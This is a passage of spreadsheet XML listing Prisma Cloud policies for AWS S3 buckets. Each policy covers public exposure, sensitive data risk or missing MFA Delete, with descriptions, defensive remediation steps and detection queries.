aws s3api put-bucket-versioning --bucket &lt;BUCKET_NAME&gt; --versioning-configuration Status=Enabled,MFADelete=Enabled --mfa '&lt;MFA_SERIAL_NUMBER&gt; &lt;MFA_CODE&gt;'
NOTE: The bucket owner, the AWS account that created the bucket (root account), and all authorized IAM users can enable versioning, but only the bucket owner (root account) can enable MFA Delete. Successful execution will enable the S3 bucket versioning and MFA delete on the bucket.
[DATA_EXPOSURE]
1. Make sure the resource is not exposed to public.
2. Delete or move the sensitive data if it is mistakenly place</t>
        </is>
      </c>
      <c r="Y2097" t="inlineStr"/>
      <c r="Z2097" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-s3api-get-bucket-acl') and finding.name contains all ('AWS S3 bucket publicly writable','AWS S3 bucket is not configured with MFA Delete','Storage Asset with sensitive data found')</t>
        </is>
      </c>
      <c r="AA2097" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2097" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:06</t>
        </is>
      </c>
      <c r="AC2097" t="inlineStr"/>
      <c r="AD2097" t="b">
        <v>1</v>
      </c>
      <c r="AE2097" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2097" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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7" t="inlineStr">
        <is>
          <t>94badbc1-96e9-460e-af43-8e8a63b006af</t>
        </is>
      </c>
      <c r="AI2097" t="inlineStr">
        <is>
          <t>833f740e-6f14-4e01-a98e-1c4f00eac97d</t>
        </is>
      </c>
      <c r="AJ2097" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2097" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2098">
      <c r="A2098" t="inlineStr">
        <is>
          <t>ISO 27001:2013, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, HITRUST CSF v.9.6.0, MAS TRM 2021, MAS TRM 2021, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, NIST CSF, CHC HITRUST CSF v.9.6.0, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CHC HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, Risk Management in Technology (RMiT), ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, SOC 2, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.1.02, HITRUST v.9.4.2 [Deprecated], CIS Controls v8.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v.9.6.0, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, NIST SP 800-172, CSA CCM v.4.0.1, kfirdaus AWS Account-CS, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2098" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2098" s="2" t="inlineStr"/>
      <c r="D2098" t="inlineStr"/>
      <c r="E2098" t="inlineStr"/>
      <c r="F2098" t="inlineStr"/>
      <c r="G2098" t="b">
        <v>0</v>
      </c>
      <c r="H20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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2098" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2098" t="inlineStr">
        <is>
          <t>AWS S3 buckets with configurations set to host websites</t>
        </is>
      </c>
      <c r="L2098" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2098" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2098" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2098" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2098" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2098" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2098" t="inlineStr">
        <is>
          <t>ISM-1518</t>
        </is>
      </c>
      <c r="S2098" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2098" t="b">
        <v>0</v>
      </c>
      <c r="U2098" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2098" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2098" t="inlineStr">
        <is>
          <t>This policy identifies AWS S3 buckets that are configured to host websites. To host a website on AWS S3 you should configure a bucket as a website. By frequently surveying these S3 buckets, you can ensure that only authorized buckets are enabled to host websites. Make sure to disable static website hosting for unauthorized S3 buckets.</t>
        </is>
      </c>
      <c r="X2098" t="inlineStr">
        <is>
          <t>1. Login to AWS Console
2. Goto S3 under Services
3. Choose the reported bucket
4. Goto Properties tab
5. Click on Static website hosting
6. Click on Disable website hosting
7. Click on Save</t>
        </is>
      </c>
      <c r="Y2098" t="inlineStr"/>
      <c r="Z2098" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-s3api-get-bucket-acl' AND json.rule =  'websiteConfiguration exists'</t>
        </is>
      </c>
      <c r="AA2098" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2098" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2098" t="inlineStr">
        <is>
          <t>PC-AWS-S3-141</t>
        </is>
      </c>
      <c r="AD2098" t="b">
        <v>1</v>
      </c>
      <c r="AE2098" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2098" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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8" t="inlineStr">
        <is>
          <t>ab0b23a9-1e97-4991-840b-06e7111f38ee</t>
        </is>
      </c>
      <c r="AI2098" t="inlineStr">
        <is>
          <t>3a8f1900-3a6c-46f8-b003-acaf47fd2108</t>
        </is>
      </c>
      <c r="AJ2098" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2098" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2099">
      <c r="A2099" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, ISO/IEC 27001:2022, Demo_Daryl ACSC Information Security Manual (ISM), ISO/IEC 27017:2015, APRA (CPS 234) Information Security, ISO 27002:2022, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, RBI Baseline Cyber Security and Resilience Requirements, Secure Controls Framework (SCF) - 2024.2, RBI Baseline Cyber Security and Resilience Requirements, CIS Controls v8.1, ISO 27002:2022, NIST SP 800-172, Demo_Daryl ACSC Information Security Manual (ISM), HITRUST CSF v.11.2.0, ISO/IEC 27017:2015, kfirdaus AWS Account-CS, NIST CSF v2.0, CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ACSC Information Security Manual (ISM), NIST SP 800-171 Revision 3, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v8.2 [Deprecated], Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), MITRE ATT&amp;CK v12, TX-RAMP Level 1, TX-RAMP Level 1, CSA CCM v4.0.12, ISO 27002:2022, jneytchev-fedramp-low, CIS v3.0.0 (AWS) Level 2, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, NIST 800-53 Rev4, CIS Controls v8.1, ISO/IEC 27017:2015, ISO/IEC 27017:2015, Matt's ATT&amp;ACK, Secure Controls Framework (SCF) - 2022.2.1, wells fargo CIS v1.5.0 (AWS) - Level 1, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST CSF v.11.2.0, Copy of ACSC Information Security Manual (ISM)-clone, CDC NIST 800-53 Rev4, Fedramp (Moderate), NIST CSF, ISO/IEC 27001:2022, Fedramp (Low), CIS Controls v7.1, ISO/IEC 27017:2015, MAS TRM 2021, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, CHC HITRUST CSF v.9.6.0, Telecommunications Security Act - TSA, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, Fedramp (Low), NIST 800-53 Rev 5, ISO/IEC 27002:2013, MITRE ATT&amp;CK v6.3 [Deprecated], Copy of CIS Controls v8, TX-RAMP Level 2, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CRI Profile v1.2.1, PCI DSS v3.2.1, Risk Management in Technology (RMiT), TX-RAMP Level 2, ISO/IEC 27002:2013, NIST SP 800-171 Revision 3, Australian Energy Sector Cyber Security Framework (AESCSF), CIS Controls v8, CIS Controls v8, MLPS 2.0 (Level 2), ISO/IEC 27017:2015, CRI Profile v2.0, CSA CCM v.4.0.1, CIS v2.0.0 (AWS) - Level 2, Telecommunications Security Act - TSA, ISO/IEC 27002:2013, SOC 2, NYDFS 23 CRR-NY 500.0, CSA CCM v.4.0.1, ISO/IEC 27001:2022, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CIS v1.5.0 (AWS) - Level 1, HIPAA, Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CDC NIST 800-53 Rev4, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27001:2022, HITRUST v.9.4.2 [Deprecated], HITRUST CSF v.11.2.0, CIS Controls v8.1, CIS v1.4.0 (AWS), Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, ISO 27002:2022, Copy of CIS Controls v8, ISO/IEC 27001:2022, NYDFS 23 CRR-NY 500.0, HITRUST CSF v.9.6.0, CSA CCM v4.0.12, NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, CCPA 2018, MITRE ATT&amp;CK v10.0 [Deprecated], ITSG-33, PIPEDA, jneytchev-fedramp-low, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, CIS Controls v8.1, NIST 800-53 Rev 5, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), NIST SP 800-171 Revision 2, Fedramp (Moderate), FFIEC, NIST SP 800-172, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, kfirdaus AWS Account-CS, CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), ISO/IEC 27018:2019, Australian Cyber Security Centre (ACSC) Essential Eight, ACSC Information Security Manual (ISM), Microsoft Cloud Security Benchmark v1, kashan ACSC Information Security Manual (ISM)</t>
        </is>
      </c>
      <c r="B2099" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2099" s="2" t="inlineStr"/>
      <c r="D2099" t="inlineStr"/>
      <c r="E2099" t="inlineStr"/>
      <c r="F2099" t="inlineStr"/>
      <c r="G2099" t="b">
        <v>1</v>
      </c>
      <c r="H20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099" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2099" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2099" t="inlineStr">
        <is>
          <t>AWS S3 bucket is not configured with MFA Delete</t>
        </is>
      </c>
      <c r="L2099" t="inlineStr">
        <is>
          <t>MFA</t>
        </is>
      </c>
      <c r="M2099" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2099" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2099" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2099" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2099" t="inlineStr">
        <is>
          <t>Guidelines for System Hardening</t>
        </is>
      </c>
      <c r="R2099" t="inlineStr">
        <is>
          <t>ISM-1173</t>
        </is>
      </c>
      <c r="S2099" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2099" t="b">
        <v>0</v>
      </c>
      <c r="U2099" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2099" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2099" t="inlineStr">
        <is>
          <t>This policy identifies the S3 buckets which do not have Multi-Factor Authentication(MFA) enabled to delete S3 object version. Enabling MFA Delete on a versioned bucket adds another layer of protection. In order to permanently delete an object version or suspend or reactivate versioning on the bucket valid code from the account's MFA device required.
Note: MFA Delete only works for CLI or API interaction, not in the AWS Management Console. Also, you cannot make version DELETE actions with MFA using IAM user credentials. You must use your root AWS account.</t>
        </is>
      </c>
      <c r="X2099" t="inlineStr">
        <is>
          <t>Using console you can enable versioning on the bucket but you cannot enable MFA delete.
You can do it via only with the AWS CLI:
aws s3api put-bucket-versioning --bucket &lt;BUCKET_NAME&gt; --versioning-configuration Status=Enabled,MFADelete=Enabled --mfa "&lt;MFA_SERIAL_NUMBER&gt; &lt;MFA_CODE&gt;"
NOTE: The bucket owner, the AWS account that created the bucket (root account), and all authorized IAM users can enable versioning, but only the bucket owner (root account) can enable MFA Delete. Successful execution will enable the S3 bucket versioning and MFA delete on the bucket.</t>
        </is>
      </c>
      <c r="Y2099" t="inlineStr"/>
      <c r="Z2099" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-s3api-get-bucket-acl' AND json.rule = versioningConfiguration.status equals Enabled and (versioningConfiguration.mfaDeleteEnabled does not exist or versioningConfiguration.mfaDeleteEnabled is false) AND (bucketLifecycleConfiguration does not exist or bucketLifecycleConfiguration.rules[*].status equals Disabled)</t>
        </is>
      </c>
      <c r="AA2099" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2099" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2099" t="inlineStr">
        <is>
          <t>PC-AWS-S3-417</t>
        </is>
      </c>
      <c r="AD2099" t="b">
        <v>1</v>
      </c>
      <c r="AE2099" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2099" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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099" t="inlineStr">
        <is>
          <t>55486658-ae4a-4691-9eb7-a1074981fbe7</t>
        </is>
      </c>
      <c r="AI2099" t="inlineStr">
        <is>
          <t>be7fdc80-f111-47b1-8688-e32fda4b5920</t>
        </is>
      </c>
      <c r="AJ2099" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2099" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2100">
      <c r="A2100" t="inlineStr"/>
      <c r="B2100" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2100" s="2" t="inlineStr"/>
      <c r="D2100" t="inlineStr"/>
      <c r="E2100" t="inlineStr"/>
      <c r="F2100" t="inlineStr"/>
      <c r="G2100" t="b">
        <v>1</v>
      </c>
      <c r="H21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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2100" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2100" t="inlineStr">
        <is>
          <t>Data exposure risk due to sensitive data in AWS S3 bucket that is accessible to any authenticated user</t>
        </is>
      </c>
      <c r="L2100" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,DISCOVERY</t>
        </is>
      </c>
      <c r="M2100" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2100" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2100" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2100" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2100" t="inlineStr"/>
      <c r="R2100" t="inlineStr"/>
      <c r="S2100" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2100" t="b">
        <v>0</v>
      </c>
      <c r="U2100" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2100" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2100" t="inlineStr">
        <is>
          <t>This policy identifies potential data exposure risk due to an AWS S3 bucket that is to any authenticated user and contains sensitive data.
AWS S3 buckets that are accessible to any authenticated AWS users and contain sensitive data, such as PII and financial information allows attackers to gain access to sensitive data. The combination of these events indicates a potential data breach risk in the cloud environment.
Immediate attention is required to enforce stricter access methods for the reported S3 bucket as it contains sensitive information.</t>
        </is>
      </c>
      <c r="X2100" t="inlineStr">
        <is>
          <t>[MISCONFIGURATION]
1. Login to the AWS Console
2. Navigate to the 'S3' service
3. Click on the 'S3' resource reported in the alert
4. Click on the 'Permissions'
5. Under 'Public access', Click on 'Any AWS user' and uncheck all items
6. Click on Save
[DATA_EXPOSURE]
1. Make sure the resource is not exposed to public.
2. Delete or move the sensitive data if it is mistakenly place</t>
        </is>
      </c>
      <c r="Y2100" t="inlineStr"/>
      <c r="Z2100" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-s3api-get-bucket-acl') and finding.name contains all ('AWS S3 buckets are accessible to any authenticated user','Storage Asset with sensitive data found')</t>
        </is>
      </c>
      <c r="AA2100" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2100" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:12</t>
        </is>
      </c>
      <c r="AC2100" t="inlineStr"/>
      <c r="AD2100" t="b">
        <v>1</v>
      </c>
      <c r="AE2100" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2100" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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0" t="inlineStr">
        <is>
          <t>178216ea-0c22-4e38-8606-1eb0d8c66e5c</t>
        </is>
      </c>
      <c r="AI2100" t="inlineStr">
        <is>
          <t>df8ffb4b-7d59-4a4e-b71b-81e43d9bb5e1</t>
        </is>
      </c>
      <c r="AJ2100" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2100" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2101">
      <c r="A2101" t="inlineStr"/>
      <c r="B2101" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2101" s="2" t="inlineStr"/>
      <c r="D2101" t="inlineStr"/>
      <c r="E2101" t="inlineStr"/>
      <c r="F2101" t="inlineStr"/>
      <c r="G2101" t="b">
        <v>1</v>
      </c>
      <c r="H21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101" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2101" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2101" t="inlineStr">
        <is>
          <t>Potential data destruction risk due to AWS S3 bucket publicly exposed with data destruction permissions through IAM policies and not configured with MFA delete</t>
        </is>
      </c>
      <c r="L2101" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,MFA</t>
        </is>
      </c>
      <c r="M2101" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2101" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2101" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2101" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2101" t="inlineStr"/>
      <c r="R2101" t="inlineStr"/>
      <c r="S2101" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2101" t="b">
        <v>0</v>
      </c>
      <c r="U2101" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2101" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2101" t="inlineStr">
        <is>
          <t>This policy identifies potential destruction risk due to AWS S3 buckets that are publicly exposed with data destruction permissions through IAM policies and not configured with MFA delete.
Publicly accessible AWS S3 bucket with 's3:DeleteBucket' permissions can be extremely risky. This combination of permissions allows anyone with access to the bucket to delete the bucket. If unauthorized access or compromise occurs, it could result in intentional or accidental data destruction, leading to permanent loss of important or sensitive information stored in the bucket. Enabling MFA Delete on a versioned bucket adds another layer of protection. In order to permanently delete an object version or suspend or reactivate versioning on the bucket valid code from the account's MFA device is required.
Immediate attention is required to configure MFA delete on S3 buckets, review risky privilege escalation permissions, and restrict public exposure reported for the S3 bucket as soon as possible.</t>
        </is>
      </c>
      <c r="X2101" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
1. Log in to the AWS console
2. Navigate to the AWS S3 bucket service
3. Find resource-based policy of the S3 bucket resource
4. Update the 'Principal' section of the policy to avoid public access
5. Remove the risky actions
[MISCONFIGURATION]
Using console you can enable versioning on the bucket but you cannot enable MFA delete.
You can do it via only with the AWS CLI:
aws s3api put-bucket-versioning --bucket &lt;BUCKET_NAME&gt; --versioning-configuration Status=Enabled,MFADelete=Enabled --mfa '&lt;MFA_SERIAL_NUMBER&gt; &lt;MFA_CODE&gt;'
NOTE: The bucket owner, the AWS account that created the bucket (root account), and all authorized IAM users can enable versioning, but only the bucket owner (root account) can enable MFA Delete. Successful execution will enable the S3 bucket versioning and MFA delete on the bucket.</t>
        </is>
      </c>
      <c r="Y2101" t="inlineStr"/>
      <c r="Z2101" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-s3api-get-bucket-acl') and finding.name contains all ('AWS S3 Bucket with Data Destruction Permissions is Publicly Accessible Through Resource-Based Policies','AWS S3 bucket is not configured with MFA Delete')</t>
        </is>
      </c>
      <c r="AA2101" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2101" t="inlineStr">
        <is>
          <t>2024-06-21 07:13:02</t>
        </is>
      </c>
      <c r="AC2101" t="inlineStr"/>
      <c r="AD2101" t="b">
        <v>1</v>
      </c>
      <c r="AE2101" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2101" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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01" t="inlineStr">
        <is>
          <t>daf02d03-4c1b-4725-82d7-9a329a40c53c</t>
        </is>
      </c>
      <c r="AI2101" t="inlineStr">
        <is>
          <t>834774e4-15a0-457e-81df-83a70af70024</t>
        </is>
      </c>
      <c r="AJ2101" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2101" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2102">
      <c r="A2102" t="inlineStr"/>
      <c r="B2102" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2102" s="2" t="inlineStr"/>
      <c r="D2102" t="inlineStr"/>
      <c r="E2102" t="inlineStr"/>
      <c r="F2102" t="inlineStr"/>
      <c r="G2102" t="b">
        <v>1</v>
      </c>
      <c r="H21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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2102" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2102" t="inlineStr">
        <is>
          <t>Data exposure risk due to sensitive data in AWS S3 bucket that is publicly accessible through IAM policies</t>
        </is>
      </c>
      <c r="L2102" t="inlineStr">
        <is>
          <t>DISCOVERY,UNAUTHORIZED_ACCESS</t>
        </is>
      </c>
      <c r="M2102" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2102" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2102" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2102" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2102" t="inlineStr"/>
      <c r="R2102" t="inlineStr"/>
      <c r="S2102" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2102" t="b">
        <v>0</v>
      </c>
      <c r="U2102" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2102" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2102" t="inlineStr">
        <is>
          <t>This policy identifies potential data exposure risk due to an AWS S3 bucket that is publicly accessible through IAM policies and contains sensitive data.
The combination of public access and sensitive data increases the security risks and potential impact of a breach. Proper access control and data protection measures should be in place to prevent potential compromise of critical data.
Immediate attention is required to enforce stricter access methods for the reported S3 bucket as it contains sensitive information.</t>
        </is>
      </c>
      <c r="X2102" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
Remediation steps:
1. Log in to the AWS console
2. Navigate to the AWS S3 bucket service
3. Find resource-based policy of the S3 bucket resource
4. Update the 'Principal' section of the policy to avoid public access
[DATA_EXPOSURE]
1. Make sure the resource is not exposed to public.
2. Delete or move the sensitive data if it is mistakenly place</t>
        </is>
      </c>
      <c r="Y2102" t="inlineStr"/>
      <c r="Z2102" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-s3api-get-bucket-acl') and finding.name contains all ('AWS S3 bucket is Publicly Accessible Through Resource-Based Policies','Storage Asset with sensitive data found')</t>
        </is>
      </c>
      <c r="AA2102" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2102" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:13</t>
        </is>
      </c>
      <c r="AC2102" t="inlineStr"/>
      <c r="AD2102" t="b">
        <v>1</v>
      </c>
      <c r="AE2102" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2102" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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2" t="inlineStr">
        <is>
          <t>cbc091b6-f954-487a-9c54-1b28fbda9270</t>
        </is>
      </c>
      <c r="AI2102" t="inlineStr">
        <is>
          <t>4ab82566-907a-4b4e-be8b-111ea659023c</t>
        </is>
      </c>
      <c r="AJ2102" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2102" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2103">
      <c r="A2103" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, MLPS 2.0 (Level 2), MLPS 2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v8.2 [Deprecated], HITRUST CSF v.9.6.0, MAS TRM 2021, MAS TRM 2021, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, Korea – Information Security Management System (ISMS), NIST CSF, CHC HITRUST CSF v.9.6.0, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CHC HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, MITRE ATT&amp;CK v6.3 [Deprecated], PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, Korea – Information Security Management System (ISMS), ISO/IEC 27002:2013, APRA (CPS 234) Information Security, HITRUST v.9.4.2 [Deprecated], CIS AWS 3 Tier Web Architecture Benchmark v.1.0.0, CIS Controls v8.1, ISO/IEC 27002:2013, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
